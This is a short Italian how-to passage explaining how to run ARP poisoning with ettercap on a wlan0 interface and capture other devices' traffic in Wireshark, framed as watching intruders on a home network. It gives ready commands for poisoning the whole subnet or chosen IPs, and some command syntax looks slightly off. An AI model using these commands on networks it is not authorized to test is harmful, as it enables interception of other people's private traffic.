Se sei su una macchina Linux, installa ettercap
e wireshark
.
Per prima cosa, scopri la tua maschera di rete (dovrebbe essere 255.255.255.0 per una normale rete domestica). Puoi farlo con ifconfig wlan0|grep Mask|sed s/^.*Mask://)
Quindi esegui:
sudo ettercap -T -M -i wlan0 ARP // // -n 255.255.255.0
Se conosci l'IP degli intrusi, puoi inserirlo tra le prime barre:
sudo ettercap -T -M -i wlan0 ARP /192.168.1.101,192.168.1.102/ // -n 255.255.255.0
(sostituendo 255.255.255.0
con la maschera di rete)
Potrebbe essere necessario attendere un po 'per caricarlo. Nel frattempo, apri Wireshark:
Apri un nuovo terminale ed esegui gksudo wireshark&
. Utilizzare il secondo pulsante (chiave inglese) nel menu Wireshark, impostare l'interfaccia di rete su wlan0
e avviare l'acquisizione. Dovresti essere in grado di vedere tutti i pacchetti nella rete (a meno che non sia stato filtrato dall'IP sorgente in ettercap).